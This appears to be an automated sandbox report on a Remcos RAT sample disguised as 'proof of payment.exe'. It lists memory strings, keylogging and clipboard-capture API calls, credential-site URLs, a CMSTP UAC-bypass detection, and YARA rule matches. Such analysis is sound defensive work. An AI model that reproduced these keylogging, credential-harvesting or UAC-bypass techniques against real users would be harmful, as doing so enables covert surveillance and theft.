                    Source: proof of payment.exe, 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp2
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpOw
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp_
                    Source: bhv58.tmp.15.dr | String found in binary or memory: http://ocsp.digicert.com0
                    Source: proof of payment.exe, 00000000.00000002.1499485685.0000000002661000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1538465921.0000000002648000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
                    Source: proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
                    Source: proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
                    Source: proof of payment.exe, 0000000F.00000002.1695925897.00000000009C4000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
                    Source: proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
                    Source: proof of payment.exe, 0000000F.00000002.1696807471.00000000010BD000.00000004.00000020.00020000.00000000.sdmp, proof of payment.exe, 0000000F.00000002.1696448109.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: proof of payment.exe, 0000000F.00000002.1696448109.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: proof of payment.exe, 0000000F.00000002.1696448109.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
                    Source: proof of payment.exe, 0000000F.00000002.1696448109.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: proof of payment.exe | String found in binary or memory: https://login.yahoo.com/config/login
                    Source: proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
                    Source: proof of payment.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000
                    Source: C:\Users\user\Desktop\proof of payment.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\proof of payment.exe
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx

                    E-Banking Fraud

                    Source: Yara match | File source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: proof of payment.exe PID: 3640, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0041C9E2 SystemParametersInfoW

                    System Summary

                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.proof of payment.exe.2683120.0.raw.unpack, .cs | Large array initialization: array initializer size 33957
                    Source: 0.2.proof of payment.exe.4f00000.4.raw.unpack, .cs | Large array initialization: array initializer size 33957
                    Source: 8.2.NvbYSEq.exe.25c3108.0.raw.unpack, .cs | Large array initialization: array initializer size 33957
                    Source: initial sample | Static PE information: Filename: proof of payment.exe
                    Source: C:\Users\user\Desktop\proof of payment.exe | Process Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00401806 NtdllDefWindowProc_W
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_004018C0 NtdllDefWindowProc_W
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_004016FD NtdllDefWindowProc_A
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_004017B7 NtdllDefWindowProc_A
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_00402CAC NtdllDefWindowProc_A
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_00402D66 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 0_2_00D5DCD4
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 7_2_10017194
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 7_2_1000B5C1
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 8_2_00C5DCD4
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 8_2_04B57118
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 8_2_04B50006
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 8_2_04B50040
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 8_2_04B57109
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 8_2_06860007
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 8_2_06863EE7
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 8_2_06863EF8
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 8_2_069140E0
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0043E0CC
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0041F0FA
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00454159
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00438168
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_004461F0
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0043E2FB
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0045332B
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0042739D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_004374E6
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0043E558
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00438770
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_004378FE
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00433946
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0044D9C9
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00427A46
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0041DB62
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00427BAF
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00437D33
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00435E5E
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00426E0E
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0043DE9D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00413FCA
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00436FEA
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0044B040
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0043610D
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00447310
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0044A490
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0040755A
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0043C560
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0044B610
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0044D6C0
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_004476F0
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0044B870
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0044081D
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00414957
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_004079EE
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00407AEB
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0044AA80
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00412AA9
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00404B74
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00404B03
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_0044BBD8
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00404BE5
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00404C76
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00415CFE
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00416D72
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00446D30
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00446D8B
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 15_2_00406E8F
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_00405038
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_0041208C
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_004050A9
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_0040511A
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_0043C13A
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_004051AB
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_00449300
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_0040D322
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_0044A4F0
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_0043A5AB
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_00413631
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_00446690
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_0044A730
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_004398D8
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_004498E0
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_0044A886
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_0043DA09
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_00438D5E
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_00449ED0
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_0041FE83
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 17_2_00430F54
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_004050C2
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_004014AB
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_00405133
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_004051A4
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_00401246
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_0040CA46
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_00405235
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_004032C8
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_00401689
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 20_2_00402F60
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: String function: 00434E10 appears 54 times
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: String function: 00402093 appears 50 times
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: String function: 00434770 appears 41 times
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 00416760 appears 69 times
                    Source: proof of payment.exe, 00000000.00000002.1499485685.0000000002661000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs proof of payment.exe
                    Source: proof of payment.exe, 00000000.00000002.1509982038.0000000004F00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs proof of payment.exe
                    Source: proof of payment.exe, 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs proof of payment.exe
                    Source: proof of payment.exe, 00000000.00000002.1510709982.0000000006A30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs proof of payment.exe
                    Source: proof of payment.exe, 00000000.00000002.1497861125.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs proof of payment.exe
                    Source: proof of payment.exeBinary or memory string: OriginalFileName vs proof of payment.exe
                    Source: proof of payment.exe, 00000014.00000002.1689804255.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs proof of payment.exe
                    Source: proof of payment.exeBinary or memory string: OriginalFilenameBAEu.exe8 vs proof of payment.exe
                    Source: proof of payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
